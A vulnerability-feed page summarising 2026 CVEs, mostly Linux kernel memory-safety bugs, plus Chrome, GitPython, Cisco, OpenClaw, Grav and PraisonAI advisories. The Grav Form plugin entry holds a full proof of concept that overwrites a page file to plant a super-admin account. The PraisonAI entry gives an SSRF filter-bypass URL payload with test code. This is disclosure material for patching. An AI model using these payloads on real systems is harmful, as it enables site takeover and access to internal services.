Skip to main content
CVE-2026-43128 HIGH PATCH This Week

Double-free vulnerability in Linux kernel RDMA subsystem allows local authenticated attackers to trigger high-severity memory corruption. The flaw in ib_umem_dmabuf_get_pinned_with_dma_device() causes dma_buf_unpin() to be called twice on error paths - once immediately on failure and again during cleanup - enabling potential privilege escalation, system crashes, or information disclosure. Patches available for kernels 6.1.165+, 6.6.128+, 6.12.75+, 6.18.16+, 6.19.6+, and 7.0+. EPSS score of 0.02% indicates low widespread exploitation probability, with no active exploitation or public POCs identified at time of analysis.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43078 HIGH PATCH This Week

Memory corruption in the Linux kernel's AF_ALG crypto subsystem allows local authenticated users to execute arbitrary code or cause denial of service through a page reassignment overflow in af_alg_pull_tsgl. The vulnerability affects multiple stable kernel branches (4.14 through 7.0) and has been patched across all maintained versions. With CVSS 7.8 and low attack complexity (AC:L), this presents a realistic privilege escalation path for local attackers, though EPSS exploitation probability remains low at 0.02% and no public exploit or KEV listing exists at time of analysis.

Buffer Overflow Linux Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43260 HIGH PATCH This Week

In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix RSS context delete logic We need to free the corresponding RSS context VNIC in FW everytime an RSS context is deleted in driver. Commit 667ac333dbb7 added a check to delete the VNIC in FW only when netif_running() is true to help delete RSS contexts with interface down. Having that condition will make the driver leak VNICs in FW whenever close() happens with active RSS contexts. On the subsequent open(), as part of RSS context restoration, we will end up trying to create extra VNICs for which we did not make any reservation. FW can fail this request, thereby making us lose active RSS contexts. Suppose an RSS context is deleted already and we try to process a delete request again, then the HWRM functions will check for validity of the request and they simply return if the resource is already freed. So, even for delete-when-down cases, netif_running() check is not necessary. Remove the netif_running() condition check when deleting an RSS context.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43258 HIGH PATCH This Week

Local privilege escalation and memory corruption in Linux kernel on Alpha architecture allows authenticated users to execute arbitrary code, corrupt heap memory, or crash systems via insufficient TLB shootdown during memory compaction. The vulnerability affects Alpha systems exclusively and manifests as SIGSEGV crashes, glibc allocator corruption, and compiler failures. EPSS score of 0.02% indicates low likelihood of widespread exploitation, though vendor patches are available across multiple stable kernel branches. Attack requires local authenticated access with low complexity (CVSS AV:L/AC:L/PR:L), limiting remote exploitation scenarios.

Linux Buffer Overflow Memory Corruption Red Hat Suse
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43250 HIGH PATCH This Week

In the Linux kernel, the following vulnerability has been resolved: usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke() The ChipIdea UDC driver can encounter "not page aligned sg buffer" errors when a USB device is reconnected after being disconnected during an active transfer. This occurs because _ep_nuke() returns requests to the gadget layer without properly unmapping DMA buffers or cleaning up scatter-gather bounce buffers. Root cause: When a disconnect happens during a multi-segment DMA transfer, the request's num_mapped_sgs field and sgt.sgl pointer remain set with stale values. The request is returned to the gadget driver with status -ESHUTDOWN but still has active DMA state. If the gadget driver reuses this request on reconnect without reinitializing it, the stale DMA state causes _hardware_enqueue() to skip DMA mapping (seeing non-zero num_mapped_sgs) and attempt to use freed/invalid DMA addresses, leading to alignment errors and potential memory corruption. The normal completion path via _hardware_dequeue() properly calls usb_gadget_unmap_request_by_dev() and sglist_do_debounce() before returning the request. The _ep_nuke() path must do the same cleanup to ensure requests are returned in a clean, reusable state. Fix: Add DMA unmapping and bounce buffer cleanup to _ep_nuke() to mirror the cleanup sequence in _hardware_dequeue(): - Call usb_gadget_unmap_request_by_dev() if num_mapped_sgs is set - Call sglist_do_debounce() with copy=false if bounce buffer exists This ensures that when requests are returned due to endpoint shutdown, they don't retain stale DMA mappings. The 'false' parameter to sglist_do_debounce() prevents copying data back (appropriate for shutdown path where transfer was aborted).

Memory Corruption Buffer Overflow Linux Red Hat Suse
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43248 HIGH PATCH This Week

Out-of-bounds write in Linux kernel vhost_vdpa subsystem allows local authenticated users to achieve arbitrary kernel memory corruption via ASID group assignment. Affects Linux kernel versions 5.19 through 6.19.x, with vendor patches available for stable branches 6.12.75, 6.18.16, 6.19.6, and mainline 7.0. Exploitation requires local access with low privileges but no user interaction (CVSS:3.1/AV:L/AC:L/PR:L/UI:N). EPSS score of 0.02% (5th percentile) indicates low predicted exploitation probability, and no public exploit code or active exploitation confirmed at time of analysis.

Linux Buffer Overflow Memory Corruption Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43222 HIGH PATCH This Week

A memory corruption vulnerability in the Linux kernel's Verisilicon AV1 media driver allows local authenticated attackers to write tile info data beyond allocated buffer boundaries, potentially achieving arbitrary code execution with kernel privileges. The vulnerability affects kernel versions from 6.5 onwards where commit 727a400686a2 introduced the flaw. Patches are available across multiple stable kernel branches (6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0). EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, with no public exploit identified at time of analysis and no CISA KEV listing.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43178 HIGH PATCH This Week

Double memory management structure free (mmput) in Linux kernel procfs allows local authenticated attackers with low privileges to cause high-impact memory corruption, potentially leading to privilege escalation, information disclosure, or denial of service. The flaw triggers when userspace provides an incorrectly sized buffer to the PROCMAP_QUERY interface, causing the kernel to call mmput() twice on the same mm_struct after recent code refactoring moved cleanup logic. Patch available from kernel.org stable trees for versions 6.12.75, 6.18.16, 6.19.6, and mainline 7.0. EPSS score of 0.02% (5th percentile) indicates very low probability of exploitation in the wild, consistent with the local attack vector requiring authenticated access and specific API interaction. No CISA KEV listing or public exploit identified at time of analysis.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43153 HIGH PATCH This Week

A use-after-free flaw in the Linux kernel XFS filesystem's xfs_attr_leaf_hasname() function allows local authenticated attackers to potentially execute arbitrary code with kernel privileges or cause denial of service. The function's problematic calling convention can return a pointer to an already-released buffer when xfs_attr3_leaf_lookup_int fails with specific error codes, creating a memory safety issue. Despite a CVSS score of 7.8, EPSS indicates only 0.02% probability of exploitation (5th percentile), suggesting low real-world targeting. Vendor patches are available across multiple stable kernel versions (6.12.75, 6.18.16, 6.19.6, 7.0), and the fix has been committed upstream.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43138 HIGH PATCH This Week

In the Linux kernel, the following vulnerability has been resolved: reset: gpio: suppress bind attributes in sysfs This is a special device that's created dynamically and is supposed to stay in memory forever. We also currently don't have a devlink between it and the actual reset consumer. Suppress sysfs bind attributes so that user-space can't unbind the device because - as of now - it will cause a use-after-free splat from any user that puts the reset control handle.

Information Disclosure Use After Free Memory Corruption Linux Red Hat +1
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43126 HIGH PATCH This Week

Use-after-free in Linux kernel ALSA OSS mixer allows authenticated local attackers with low privileges to achieve arbitrary code execution, privilege escalation, or denial of service. The vulnerability stems from insufficient card disconnection checks when OSS mixer layer calls kcontrol operations individually, creating a race condition window where pending calls continue after device removal. Upstream patches available across kernel versions 6.12.75, 6.18.16, 6.19.6, and 7.0. EPSS score of 0.02% (5th percentile) indicates minimal observed exploitation probability, and no KEV listing or public exploit identified at time of analysis.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43120 HIGH PATCH This Week

Double-free memory corruption in Linux kernel RDMA/irdma driver allows local authenticated users to cause denial of service or potentially escalate privileges. The vulnerability occurs during memory region re-registration (rereg_user_mr) when IB_MR_REREG_TRANS flag is set: if umem allocation succeeds but subsequent steps fail, the umem is freed without nulling the pointer, leading to double-free when userspace calls ibv_dereg_mr. Vendor patches available across multiple stable kernel branches (6.6.136, 6.12.83, 6.18.24, 6.19.14, 7.0). EPSS score of 0.02% (5th percentile) indicates very low probability of exploitation in the wild, with no active exploitation confirmed (not in CISA KEV).

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43111 HIGH PATCH This Week

Race condition in Linux kernel HID roccat driver enables local privilege escalation through use-after-free memory corruption. Local authenticated attackers can exploit concurrent access to device reader lists during roccat_report_event() operations, achieving arbitrary code execution with high integrity impact (CVSS 7.8). Vendor-released patches available across multiple kernel branches (6.6.136, 6.12.83, 6.18.24, 6.19.14, 7.0). EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability despite moderate severity, suggesting limited weaponization in current threat landscape.

Information Disclosure Linux Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43106 HIGH PATCH This Week

A reference counting error in Linux kernel's cachefiles subsystem allows local authenticated users to trigger memory corruption and potentially escalate privileges. The vulnerability stems from cachefiles_cull() passing a dentry with insufficient reference count to cachefiles_bury_object(), causing a use-after-free condition. With CVSS 7.8 (high severity) but only 0.02% EPSS exploitation probability (5th percentile), this represents a kernel memory safety issue requiring local access with low attack complexity. Patches available in stable kernel versions 6.19.14 and 7.0.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43097 HIGH PATCH This Week

Double-free vulnerability in the Linux kernel PCI Hyper-V driver allows local authenticated users to trigger kernel memory corruption and potentially escalate privileges. The flaw occurs in hv_pci_probe() error handling where ida_free() is called twice on the same domain number, leading to memory allocator corruption. Patches released in kernel 6.19.14 and 7.0 fix the issue by removing the redundant ida_free call. EPSS score of 0.02% indicates low exploitation probability in the wild, and no public exploit or KEV listing identified at time of analysis.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43093 HIGH PATCH This Week

Insufficient memory validation in Linux kernel's XSK (AF_XDP socket) UMEM registration allows local authenticated users to corrupt kernel memory structures, potentially leading to privilege escalation or system crashes. The xdp_umem_reg() function fails to validate adequate headroom space for minimum-sized Ethernet frames and skb_shared_info structures in multi-buffer scenarios, enabling memory corruption when XSK frames are processed. Vendor patches are available across multiple stable kernel branches (6.6.136, 6.12.83, 6.18.24, 6.19.14, 7.0). EPSS score of 0.02% indicates very low probability of mass exploitation, with no active exploitation or public POC identified.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43091 HIGH PATCH This Week

Use-after-free in Linux kernel's XFRM subsystem allows local authenticated users to gain elevated privileges through a race condition during network namespace teardown. The xfrm_policy_fini() function frees policy hash tables without waiting for concurrent RCU readers, enabling attackers with low-level privileges to exploit the timing window between policy deletion and memory deallocation. EPSS score is very low (0.02%, 5th percentile) and no public exploit identified at time of analysis, but CVSS 7.8 reflects high impact if successfully exploited. Vendor-released patches available across multiple stable kernel branches (6.6.136, 6.12.83, 6.18.24, 6.19.14, mainline 7.0).

Information Disclosure Linux
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43084 HIGH PATCH This Week

Local privilege escalation in Linux kernel netfilter nfnetlink_queue allows authenticated users with low privileges to execute arbitrary code with high integrity and availability impact via race condition in shared hash table. The vulnerability stems from a use-after-free condition when multiple queues share a global hash table, enabling parallel CPU operations to access freed nf_queue_entry structures. EPSS score is low (0.02%, 5th percentile) indicating minimal observed exploitation activity. Vendor patches available across multiple stable kernel branches (6.12.83, 6.18.24, 6.19.14) with upstream commits confirmed.

Denial Of Service Linux Memory Corruption Use After Free
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43076 HIGH PATCH This Week

Use-after-free in Linux kernel's OCFS2 filesystem allows local attackers with user interaction to achieve arbitrary code execution, privilege escalation, or denial of service via crafted filesystem images. Affects kernels since initial OCFS2 implementation (2.6.16+) through 6.19.13. Vendor patches available across all supported stable branches (6.6.136, 6.12.83, 6.18.24, 6.19.14, 7.0). EPSS score of 0.02% (5th percentile) suggests low probability of mass exploitation, though CVSS 7.8 reflects high impact if triggered. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis.

Information Disclosure Linux Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43075 HIGH PATCH This Week

Out-of-bounds write in Linux kernel's ocfs2 filesystem driver allows local attackers with low privileges to achieve arbitrary code execution or system crash via a corrupted ocfs2 filesystem image. Exploitation occurs during copy_file_range operations when the malicious id_count field in the inode block exceeds physical inline data capacity, causing a buffer overflow past the inode block buffer. Vendor patches are available across multiple stable kernel versions (6.6.136, 6.12.83, 6.18.24, 6.19.14, 7.0). EPSS exploitation probability is low (0.02%, 5th percentile), and no active exploitation or public POC is currently identified.

Buffer Overflow Linux Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43074 HIGH PATCH This Week

Use-after-free in Linux kernel eventpoll subsystem allows local authenticated attackers with low privileges to achieve high-impact compromise including arbitrary code execution, privilege escalation, or system crash. The vulnerability stems from premature deallocation of the eventpoll structure while still in use by concurrent threads, creating a race condition exploitable on systems running affected kernel versions 6.4 through 6.19.x and 6.6.x through 6.12.x. Vendor patches available across all affected stable branches with EPSS indicating low widespread exploitation probability (0.02%, 5th percentile), though local access requirements limit attack surface to already-authenticated users or containerized environments.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43276 HIGH PATCH This Week

In the Linux kernel, the following vulnerability has been resolved: net: mana: Fix double destroy_workqueue on service rescan PCI path While testing corner cases in the driver, a use-after-free crash was found on the service rescan PCI path. When mana_serv_reset() calls mana_gd_suspend(), mana_gd_cleanup() destroys gc->service_wq. If the subsequent mana_gd_resume() fails with -ETIMEDOUT or -EPROTO, the code falls through to mana_serv_rescan() which triggers pci_stop_and_remove_bus_device(). This invokes the PCI .remove callback (mana_gd_remove), which calls mana_gd_cleanup() a second time, attempting to destroy the already- freed workqueue. Fix this by NULL-checking gc->service_wq in mana_gd_cleanup() and setting it to NULL after destruction. Call stack of issue for reference: [Sat Feb 21 18:53:48 2026] Call Trace: [Sat Feb 21 18:53:48 2026] <TASK> [Sat Feb 21 18:53:48 2026] mana_gd_cleanup+0x33/0x70 [mana] [Sat Feb 21 18:53:48 2026] mana_gd_remove+0x3a/0xc0 [mana] [Sat Feb 21 18:53:48 2026] pci_device_remove+0x41/0xb0 [Sat Feb 21 18:53:48 2026] device_remove+0x46/0x70 [Sat Feb 21 18:53:48 2026] device_release_driver_internal+0x1e3/0x250 [Sat Feb 21 18:53:48 2026] device_release_driver+0x12/0x20 [Sat Feb 21 18:53:48 2026] pci_stop_bus_device+0x6a/0x90 [Sat Feb 21 18:53:48 2026] pci_stop_and_remove_bus_device+0x13/0x30 [Sat Feb 21 18:53:48 2026] mana_do_service+0x180/0x290 [mana] [Sat Feb 21 18:53:48 2026] mana_serv_func+0x24/0x50 [mana] [Sat Feb 21 18:53:48 2026] process_one_work+0x190/0x3d0 [Sat Feb 21 18:53:48 2026] worker_thread+0x16e/0x2e0 [Sat Feb 21 18:53:48 2026] kthread+0xf7/0x130 [Sat Feb 21 18:53:48 2026] ? __pfx_worker_thread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork+0x269/0x350 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork_asm+0x1a/0x30 [Sat Feb 21 18:53:48 2026] </TASK>

Denial Of Service Linux Red Hat Suse
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43263 HIGH PATCH This Week

A race condition in the Linux kernel's chips-media wave5 video decoder driver allows local authenticated users to trigger a NULL pointer dereference during concurrent instance creation/destruction, potentially leading to high confidentiality, integrity, and availability impact. The vulnerability affects kernel versions from commit 9707a6254a8a onwards until patched in 6.18.16, 6.19.6, and 7.0. Fixed via interrupt handler refactoring with proper locking. EPSS score of 0.02% (4th percentile) indicates very low observed exploitation probability, and no public exploit code or CISA KEV listing exists, suggesting limited real-world exploitation despite the high CVSS 7.8 score.

Linux Null Pointer Dereference Denial Of Service Red Hat Suse
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43237 HIGH PATCH This Week

Use-after-free and reference count underflow in the Linux kernel's amdgpu DRM driver allows local authenticated users with low privileges to cause kernel panic, denial of service, and potentially execute arbitrary code with kernel privileges. The vulnerability affects amdgpu_gem_va_ioctl handling of GPU timeline fences where stale or freed fences are used due to premature fence selection and improper reference management. Patch available in kernel versions 6.18.16, 6.19.6, and 7.0. EPSS score of 0.02% indicates low observed exploitation probability, and no public exploit or active exploitation has been identified.

Denial Of Service Linux Use After Free Memory Corruption Red Hat +1
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43116 HIGH PATCH This Week

Use-after-free in Linux kernel netfilter ctnetlink allows local authenticated attackers with low privileges to achieve code execution, privilege escalation, or denial of service. The vulnerability stems from insufficient protection when accessing master conntrack objects through expectations - holding a reference on the expectation alone does not prevent the master conntrack from being freed, creating a window where exp->master points to freed memory. Patched in stable kernel versions 6.18.24, 6.19.14, and mainline 7.0. EPSS score of 0.02% (4th percentile) indicates low probability of widespread exploitation, and no public exploit or CISA KEV listing exists at time of analysis, suggesting this remains a lower-priority item despite the 7.8 CVSS score.

Information Disclosure Linux Race Condition
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7997 HIGH PATCH This Week

Local privilege escalation in Google Chrome's macOS Updater component allows attackers to gain OS-level administrative privileges through malicious files. The flaw affects Chrome versions prior to 148.0.7778.96 on macOS and requires user interaction to exploit. Google has released Chrome 148.0.7778.96 to address this vulnerability. Despite the 7.8 CVSS score, Google rates this as Low severity, reflecting the local attack vector and user interaction requirement that significantly constrain real-world exploitation scenarios.

Privilege Escalation Google Red Hat Suse Chrome
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7990 HIGH PATCH This Week

Local privilege escalation in Google Chrome's Windows updater component allows unprivileged users to gain SYSTEM-level access by exploiting insufficient input validation when the updater processes a specially crafted malicious file. Affects all Chrome versions on Windows prior to 148.0.7778.96. Google has released a patched version (148.0.7778.96). No active exploitation confirmed by CISA KEV at time of analysis, though the local attack vector and medium severity rating suggest potential for targeted attacks in enterprise environments where Chrome auto-update may be delayed.

Privilege Escalation Microsoft Google Red Hat Suse +1
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7913 HIGH PATCH This Week

Local privilege escalation in Google Chrome for Android prior to 148.0.7778.96 allows attackers to elevate privileges through malicious files exploiting insufficient policy enforcement in DevTools. The vulnerability requires user interaction to open a crafted file but grants no authentication requirement (PR:N) for the initial attack vector. Google released patch version 148.0.7778.96 addressing this high-severity flaw. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, suggesting exploitation remains theoretical or non-widespread.

Privilege Escalation Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7994 HIGH PATCH This Week

Local privilege escalation in Google Chrome Chromoting (prior to 148.0.7778.96) on Windows allows attackers to gain elevated OS-level privileges by tricking users into opening a malicious file. While CVSS scores this as high severity (7.8), real-world risk is tempered by local access and required user interaction (CVSS: AV:L/UI:R). Vendor patch available in version 148.0.7778.96 released May 2026. No active exploitation (CISA KEV) or public exploit code identified at time of analysis.

Privilege Escalation Microsoft Google Red Hat Suse +1
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7925 HIGH PATCH This Week

Use-after-free memory corruption in Chrome Remote Desktop (Chromoting) on Windows enables local privilege escalation to SYSTEM via malicious file interaction. Attackers with local access can gain OS-level administrative control by inducing users to open specially crafted files processed by the Chromoting component. Patch available in Chrome 148.0.7778.96. No evidence of active exploitation (not in CISA KEV), but the local attack vector with low complexity and high impact warrants immediate patching for Windows Chrome deployments, especially in multi-user environments where privilege boundaries are critical.

Denial Of Service Microsoft Use After Free Memory Corruption Privilege Escalation +4
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-44243 HIGH POC PATCH GHSA This Week

Path traversal in GitPython versions ≤3.1.47 enables arbitrary file write and deletion outside repository boundaries when applications pass attacker-controlled reference paths to reference creation, rename, or delete operations. A fully-functional proof-of-concept demonstrates successful exploitation by crafting reference names with '../../../' sequences to escape the `.git` directory and manipulate files with the process owner's permissions. Applications exposing GitPython reference APIs to user input-particularly Git automation services, CI/CD pipelines, and multi-tenant developer platforms-are at immediate risk, as no authentication is required at the library boundary. Fixed in version 3.1.48 per GitHub advisory GHSA-7545-fcxq-7j24.

Python Denial Of Service Path Traversal Suse Red Hat
NVD GitHub VulDB
CVSS 4.0
7.8
EPSS
0.1%
CVE-2026-20167 HIGH This Week

Cisco IoT Field Network Director enables authenticated remote attackers with low-level privileges to crash remotely managed routers by submitting crafted requests through the web-based management interface. The vulnerability causes improper error handling that allows requesting unauthorized files from managed routers, forcing them to reload and creating a denial-of-service condition (CVSS 7.7, Changed Scope). No public exploit or active exploitation reported at time of analysis.

Authentication Bypass Cisco Cisco Iot Field Network Director Iot Fnd
NVD
CVSS 3.1
7.7
EPSS
0.1%
CVE-2026-42845 HIGH PATCH GHSA This Week

### Summary (Tested on Form 9.0.3 released on April, 28th) The Form plugin's file upload handler at `user/plugins/form/classes/Form.php:583` accepts a POST-supplied `filename` parameter (`$filename = $post['filename'] ?? $upload['file']['name']`) that overrides the original uploaded filename. The override passes through `Utils::checkFilename()`, which blocks only a narrow extension list (`.php*`, `.htm*`, `.js`, `.exe`). Markdown (`.md`) is **not** blocked. A page's directory under `user/pages/` contains its `.md` content file (e.g. `default.md`, `form.md`). When a form's file upload field has `accept: ['*']` (or any policy that admits text files), an unauthenticated visitor can: 1. Upload **arbitrary content** with **`filename=form.md`** (or other page-content filenames), 2. Submit the form to trigger `Form::copyFiles()`, which **overwrites the page's own `.md` file**. ### Details **Vulnerable code path** `user/plugins/form/classes/Form.php:580-606` (in `uploadFiles()`): ```php $grav->fireEvent('onFormUploadSettings', new Event(['settings' => &$settings, 'post' => $post])); $upload = json_decode(json_encode($this->normalizeFiles($_FILES['data'], $settings->name)), true); $filename = $post['filename'] ?? $upload['file']['name']; // ← POST-controlled // ... if (!Utils::checkFilename($filename)) { // ← extension blocklist only return ['status' => 'error', 'message' => 'Bad filename']; } ``` `Utils::checkFilename()` (`system/src/Grav/Common/Utils.php:980`) blocks `..`, slashes, null bytes, leading/trailing dots, and the `uploads_dangerous_extensions` list. The default list contains: `php, php2-5, phar, phtml, html, htm, shtml, shtm, js, exe`. **`md` is not on the list**. The MIME check (lines 627-654) uses `Utils::getMimeByFilename($filename)` against the blueprint's `accept` list. With `accept: ['*']`, all filenames pass. After upload, the file is held in flash storage. When the form is submitted, `Form::copyFiles()` (`user/plugins/form/classes/Form.php:1041-1074`) calls `$upload->moveTo($destination)`: ```php $destination = $upload->getDestination(); // ← determined at upload time: // $destination = $page_dir . '/' . $filename $folder = $filesystem->dirname($destination); if (!is_dir($folder) && !@mkdir($folder, 0777, true) && !is_dir($folder)) { ... } $upload->moveTo($destination); ``` `moveTo()` does not check whether `$destination` is an existing protected file - if `form.md` (the page's own content) already exists at the destination, it is **overwritten**. A Grav page's `.md` file is parsed as YAML frontmatter + Markdown content. Whatever content the attacker uploaded becomes the new page definition. ### PoC **Setup** : Any existing page with a form like this - a "generic upload" form is the realistic case: ```yaml --- title: Upload your file form: name: upform fields: - {name: img, type: file, multiple: false, accept: ['*'], destination: 'self@'} - {name: notes, type: text} buttons: - {type: submit, value: Upload} process: - upload: true - display: thanks --- ``` 1. Atacker uploads a malicious md file that replaces the form's md file. Lets say the form is under the path `/upload`. ```yaml --- title: Pwned form: name: pwn fields: - {name: dummy, type: text} buttons: - {type: submit, value: Submit} process: - save: folder: '../accounts' filename: 'viaup.yaml' extension: yaml operation: create body: | state: enabled email: viaup@example.com fullname: Via Upload title: Admin access: admin: { login: true, super: true } site: { login: true } hashed_password: $2y$10$zGRm19Dk5ivMFZS5taMtU.O8WDUZpTqSsSg8JFs4SwOxJ/N6wl/Uq - display: thanks --- ``` (Hash above is bcrypt for `PwnPass123!`.) 2. Attacker accesses the new markdown file under the original path and loads the new markdown file `GET /upload`. 3. Attacker sends a form POST request to `/upload` and change the form_name to whatever the payload form name is. Keep in mind the nonce has to be valid. ``` POST /upload HTTP/1.1 ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="data[_json][img]" [] ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="data[notes]" ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="__form-name__" pwn ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="__unique_form_id__" 8r7q1iwdnnmcgkohlbtj ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="form-nonce" 4e9417f0c7e89d1ab4e0dbe136ec78bd ------geckoformboundary44d7ad8deb57480098493877a35ad715-- ``` 4. Login as a newly created super admin user. ### Impact Grav pages that allows user to uploads any file (besides the ones in the blocklist) with the default `self@` configuration is able to upload a malicious markdown file to overwrite the existing markdown file. In this case, unauthenticated users were able to escalate their privileges to super-admin. ### Remediation Block sensitive page-content filenames at upload In `user/plugins/form/classes/Form.php`, after `Utils::checkFilename()` succeeds, add a content-area-aware check: ```php // Block files that would overwrite Grav page content if uploaded into // a page directory. Page templates are .md (Markdown) and .yaml/.yml // (frontmatter overrides). Block both for safety. $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $pageContentExtensions = ['md', 'yaml', 'yml', 'json', 'twig']; if (in_array($ext, $pageContentExtensions, true)) { return [ 'status' => 'error', 'message' => 'File type not allowed for upload (page content files are blocked)', ]; } ``` Add `md, yaml, yml, json, twig, ini` to the global `security.uploads_dangerous_extensions` list - these all carry executable semantics in Grav's runtime even though they are not "PHP".

PHP File Upload
NVD GitHub
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-44110 HIGH PATCH GHSA This Week

Authorization bypass in OpenClaw Matrix bot integration allows DM-paired attackers to execute privileged room control commands without configured permissions. Attackers who have previously established direct message pairing can exploit misaligned allowlist logic to run room control commands in bot rooms, bypassing room membership and allowlist requirements. Fixed in version 2026.4.15 after responsible disclosure by Keen Security Lab. No evidence of active exploitation; publicly available vendor advisory and fix commits reduce exploitation probability.

Authentication Bypass Openclaw
NVD GitHub
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-42283 HIGH PATCH GHSA This Week

Cross-Site WebSocket Hijacking in DevSpace UI Server allows remote attackers to execute commands inside Kubernetes pods when developers visit malicious websites while DevSpace UI is running. The UI server's WebSocket endpoint at localhost:8090 accepts connections from any origin, enabling browser-based exploitation without authentication. DevSpace 6.3.20 and earlier are affected; version 6.3.21 contains the fix. No public exploit code identified at time of analysis, but exploitation technique is well-documented in WebSocket security research. The vulnerability enables attackers to stream pod logs, open interactive shells, and execute pipeline commands through the victim's active DevSpace session.

Information Disclosure Node.js
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-44335 HIGH PATCH GHSA This Week

### Summary The URL checking logic in PraisonAI has a logical flaw that could be bypassed by attackers, leading to SSRF attacks. ### Details The current PraisonAI project uses _validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks. <img width="1290" height="1145" alt="QQ20260424-151256-24-1" src="https://github.com/user-attachments/assets/d5f16b74-5ad2-444f-8600-b05f78a4b769" /> However, there are indeed differences in parsing between urlparse and the library that actually sends the request. Currently, almost all application scenarios in this project involve first using _validate_url for URL validation, and then using _get_session().get to send the request. <img width="1143" height="740" alt="QQ20260424-151437-24-2" src="https://github.com/user-attachments/assets/b1bf6ec2-d32a-4dac-b814-da819e8d3c83" /> In reality, its underlying mechanism is requests.get. <img width="1042" height="576" alt="QQ20260424-151645-24-3" src="https://github.com/user-attachments/assets/e17352c3-4205-44d6-ab6e-75566480215b" /> The core issue: `urlparse()` and `requests` disagree on which host a URL like `http://127.0.0.1:6666\@1.1.1.1` points to: - `urlparse()` treats `\` as a regular character and `@` as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public) - `requests` treats `\` as a path character, connecting to `127.0.0.1` (internal) Below is a test code I wrote following the code. ``` import sys from pathlib import Path from pprint import pprint sys.path.insert(0, str(Path(r"D:/BaiduNetdiskDownload/PraisonAI-main/PraisonAI-main/src/praisonai-agents"))) from praisonaiagents.tools import spider_tools # url = "http://127.0.0.1:6666\@1.1.1.1" url = "http://127.0.0.1:6666" result = spider_tools.scrape_page(url) if isinstance(result, dict) and "error" in result: print("scrape failed:", result["error"]) else: pprint(result) ``` When an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it. <img width="1068" height="128" alt="QQ20260424-152007-24-4" src="https://github.com/user-attachments/assets/294bff10-2af6-4960-bf69-dbf3340b1e9b" /> However, when an attacker uses `http://127.0.0.1:6666\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack. <img width="2089" height="324" alt="QQ20260424-152123-24-5" src="https://github.com/user-attachments/assets/4421ce42-e47b-48de-a97a-56ce56a2bbc9" /> ### PoC ``` http://127.0.0.1:6666\@1.1.1.1 ``` ### Impact SSRF

SSRF
NVD GitHub
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-20185 HIGH This Week

